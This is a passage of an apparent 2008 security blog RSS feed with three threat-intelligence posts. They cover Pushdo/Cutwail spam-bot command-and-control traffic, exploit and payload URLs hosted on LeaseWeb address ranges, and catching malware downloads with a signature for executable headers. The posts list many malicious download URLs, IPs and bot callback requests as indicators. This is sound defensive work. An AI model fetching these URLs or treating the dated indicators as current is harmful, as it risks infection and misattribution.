<p><a href="http://www.virustotal.com/analisis/88717ce59ca1b2fccbe39f4c6529aee4">Troj/Pushdo-G<br />
TrojanDownloader:Win32/Cutwail.S<br />
Trojan.Win32.Small.yrx</a></p>
<p>load.php (an exe) is downloaded from the index of /spl/. The exploit code has <a href="http://www.virustotal.com/analisis/f69e42a8360ac765febbe9dec45bb51d">2/38 detections, JS:Packed-X</a></p>
<p><strong>91.203.93.68    2008-12-03</strong> &#8211; site down<br />
pcantivirusscan.com    /2009/download/trial/A9installertest_880135.exe</p>
<p><strong>91.203.93.81    2008-11-27 </strong>- sites down<br />
codecdownload.x-softportal.com    /k-codec.335.exe<br />
2008-12-02     codecdownload.friendlysoftportal.com    /moviecodec.91.exe<br />
2008-12-04     codecdownload.allfilesherefordownload.com    /moviecodec.136.exe</p>
<p>Since easywebsiteauditor.ru drops a SPAM bot I decided to dig a little deeper. When infected, the bot first calls home via a GET to 174.36.201.82</p>
<pre>OrgName:    SoftLayer Technologies Inc.
OrgID:      <a href="http://private.dnsstuff.com/tools/whois.ch?ip=%21SOFTL&amp;server=whois.arin.net&amp;type=O">SOFTL</a>
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US</pre>
<p>GET /40E8001430303030303030303030303030303030303031306C00000<br />
1A366000000007600000642EB00053098A9B3BE HTTP/1.0</p>
<p>HTTP/1.0 200 OK<br />
Date: Fri, 12 Dec 2008 16:10:22 GMT<br />
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9<br />
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT<br />
Cache-Control: no-cache<br />
Content-Length: 110604<br />
Connection: close<br />
Content-Type: application/octet-stream</p>
<p>The stream contains some sort of obfuscated payload. It then makes a bunch of DNS requests to various smtp servers and starts to send spam. There is also a side channel of some sort that it establishes to 69.46.20.65 over port 2065.</p>
<pre>OrgName:    HIVELOCITY VENTURES CORP
OrgID:      <a href="http://private.dnsstuff.com/tools/whois.ch?ip=%21HVC-3&amp;server=whois.arin.net&amp;type=O">HVC-3</a>
Address:    400 N Tampa St
Address:    #1025
City:       Tampa
StateProv:  FL
PostalCode: 33602
Country:    US</pre>
<p>This traffic also seems obfuscated with the only readable string below:</p>
<p>L&#8230;..9ifnospam.0.exe_url..exe_url&#8230;&#8230;..</p>
<p>From doing a little digigng, this threat really is Pushdo/Cutwail. It&#8217;s interesting that the exploit site is hosted in the Ukraine, but the C&amp;Cs are located in the US.</p>
<p><a href="http://blog.fireeye.com/research/2008/12/kill-pushdo-to-kill-spam.html">Fireeye article</a><br />
<a href="http://www.secureworks.com/research/threats/pushdo/?threat=pushdo">Secure Works article</a></p>
<p>Happy hunting!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/12/sources-of-badness-uatelecom/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; LeaseWeb</title>
		<link>http://www.martinsecurity.net/2008/12/11/sources-of-badness-leaseweb/</link>
		<comments>http://www.martinsecurity.net/2008/12/11/sources-of-badness-leaseweb/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 16:32:11 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[leaseweb]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=139</guid>
		<description><![CDATA[**Edit 2**
I&#8217;d like to thank LeaseWeb for taking the time to respond to this post. It&#8217;s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The &#8220;fire and forget&#8221; mentality of notifying [...]]]></description>
			<content:encoded><![CDATA[<p>**Edit 2**</p>
<p>I&#8217;d like to thank LeaseWeb for taking the time to respond to this post. It&#8217;s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The &#8220;fire and forget&#8221; mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community will prosper.</p>
<p>**Edit** Seems this post has already drummed up some interest from several parties.</p>
<p>Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.</p>
<p>Is all of LeaseWeb&#8217;s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way, I&#8217;m sure policing such a large address space has it&#8217;s challenges.</p>
<p>The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.</p>
<p>**Edit**</p>
<p>Given the recent interest in web hosts such as MCCOLO and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list, it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.</p>
<p>If I had more hosts, maybe I could call this series of articles &#8220;The week of shady web hosts&#8221; <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
Today&#8217;s host is <strong>AS16265 LeaseWeb AS Amsterdam, Netherlands.</strong></p>
<pre>netname:        LEASEWEB
descr:          LeaseWeb
descr:          P.O. Box 93054
descr:          1090BB AMSTERDAM
descr:          Netherlands
descr:          www.leaseweb.com
remarks:        Please send email to "abuse@leaseweb.com" for complaints
remarks:        regarding portscans, DoS attacks and spam.
remarks:        INFRA-AW
country:        NL
admin-c:        LSW1-RIPE
tech-c:         LSW1-RIPE
status:         ASSIGNED PA
mnt-by:         OCOM-MNT
changed:        ripe@leaseweb.com 20071015
source:         RIPE

Information related to '85.17.0.0/16AS16265'

route:          85.17.0.0/16
descr:          LEASEWEB
origin:         AS16265
remarks:        LeaseWeb
mnt-by:         OCOM-MNT
changed:        ripe@ocom.com 20050311
changed:        ripe@ocom.com 20070610
source:         RIPE</pre>
<p>We&#8217;ve got exploits and hostile payloads from several IPs in their ranges.<br />
I haven&#8217;t had a chance to get virus total results however.</p>
<pre>85.17.212.0 - 85.17.212.255
85.17.162.0 - 85.17.162.255
85.17.189.0 - 85.17.189.255
85.17.238.0 - 85.17.238.255

<strong>IP              Date       Domain/IP            URL</strong>

85.17.162.100   2008-12-08 ad-adnet.net		/xrun.tmp (exe payload)
                2008-11-06 infonews.ath.cx	/data.pdf (exploit)
85.17.212.137	2008-12-01 www.golfinau.com	/stat/index.htm (exploit)
85.17.212.134	2008-12-09 securefilecourier.com	/downloadsetupws.php (exe payload)
85.17.189.153	2008-10-14 www.zifirgad.info	/n_fia/pdf.php (exploit)
85.17.238.144	2008-12-03 85.17.238.144	/74812/a.php (exe payload)

Xentronix network (LeaseWeb)
85.17.166.128 - 85.17.166.255

85.17.166.139	2008-11-05 85.17.166.139	/css/pdf.php (exploit)
85.17.166.229	2008-09-19 85.17.166.229	/gtest2/pdf.php (exploit)
85.17.166.231	2008-10-15 85.17.166.231	/gtest2/pdf.php (exploit)</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/11/sources-of-badness-leaseweb/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Finding the unknown on your network</title>
		<link>http://www.martinsecurity.net/2008/11/26/finding-the-unknown-on-your-network/</link>
		<comments>http://www.martinsecurity.net/2008/11/26/finding-the-unknown-on-your-network/#comments</comments>
		<pubDate>Wed, 26 Nov 2008 15:59:46 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[anti virus]]></category>
		<category><![CDATA[IDS]]></category>
		<category><![CDATA[investigation]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=135</guid>
		<description><![CDATA[One of the things I constantly keep in mind is &#8220;how do I find what I don&#8217;t know about?&#8221;. An unknown threat is what will hurt you and your organization. So how does one find something they don&#8217;t know about?
From an intrusion detection perspective, this can be quite easy. Everyone knows (or should know) that [...]]]></description>
			<content:encoded><![CDATA[<p>One of the things I constantly keep in mind is &#8220;how do I find what I don&#8217;t know about?&#8221;. An unknown threat is what will hurt you and your organization. So how does one find something they don&#8217;t know about?</p>
<p>From an intrusion detection perspective, this can be quite easy. Everyone knows (or should know) that many attacks evade IDS detection and evade AV detection. This is quite unfortunate but there is an aspect of these attacks that is very easy to detect, the transfer of an executable file.</p>
<p>Once a web based malware attack, an IM worm, or a spammed email with a link to a malicious exe is successful a payload must be downloaded. This payload is almost always an executable file or maybe a compressed file like a zip/rar/cab, etc. The file exetention may be renamed to .gif or .php, but the content of the file doesn&#8217;t lie.</p>
<p>Simply write a snort signature to look for the presence of the MZ/PE header inside the files traversing your network.</p>
<p>We have had great success with this technique, in the last 4 days alone here are some exes traversing the network. I have included my observations beside each one.</p>
<p>193.142.244.29/perce.php &#8211; non exe extension<br />
193.142.244.55/images/item_fedml.gif &#8211; non exe extension<br />
212.95.51.126/style.exe &#8211; non meaningful name from an IP<br />
59.34.197.63/exe1/b07.css &#8211; non exe extension<br />
76.163.147.77/cp/z/ &#8211; no extension at all<br />
85.17.238.144/74812/a.php &#8211; non exe extension<br />
antisxp-2009.com/install/Installer.exe &#8211; probable fake AV<br />
antivirusdefense.com/2009/download/trial/A9installertest_77014701.exe &#8211; probable fake AV<br />
antivirus-protectionscan.com/2009/download/trial/A9installertest_880147.exe &#8211; probable fake AV<br />
blufda.com/u8899r5v/exe.php &#8211; non exe extension<br />
youtube.dyndns.dk/flash_update.exe &#8211; suspicious domain using a dynamic dns service<br />
vmpmedias.com/download.php &#8211; non exe extension<br />
net-ddos.com/youxi/Server.exe &#8211; suspicious domain (must be an amature to put ddos in their domain name), suspicious exe to be downloading from a website</p>
<p>Finding those took about 5 minutes of checking at the start of each work day.</p>
<p>The problem with this technique is volume. Thousands of executables traverse a large network everyday, so how does one sort through them all? This is another fairly simple question to answer. The majority of exes being transfered should be from known good sources such as Microsoft, Adobe, Sun, Goole, Apple, etc. Simply whitelist or filter out these domains or IPs. Once these have been eliminated, the pile shrinks drastically.</p>
<p>For example, in 4 days we saw 3,318 exes transfered, aproximately 2,300 of these were from the examples above. Whitelisting will cut out 69% of those. Once that is done, simply scroll through the list and ask yourself the following questions:</p>
<p>Do any exes transfered end in a different file extension?<br />
Ex: exe.php</p>
<p>Are we seeing any bizzar looking domain names?<br />
Ex: net-ddos.com</p>
<p>Are binaries being transfered from IPs with no domain associated with it?<br />
Ex: 193.142.244.29/perce.php</p>
<p>Do the exe file names make sense with the domain they are coming from?<br />
Ex: youtube.dyndns.dk/flash_update.exe (Why would someone download a flash update from a site called youtube?)</p>
<p>With all your new found knowledge of hostile files being sent around your network, new questions arise such as:</p>
<p>Is that network segment supposed to have internet access?<br />
Did a user knowingly download it?<br />
Were they compromised by a malicious website?<br />
Did they click a link in an email?<br />
Did our AV/IDS not catch the exploit attempt?<br />
Was the file detected by AV?</p>
<p>Thankfully all these questions are yours to answer <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/11/26/finding-the-unknown-on-your-network/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
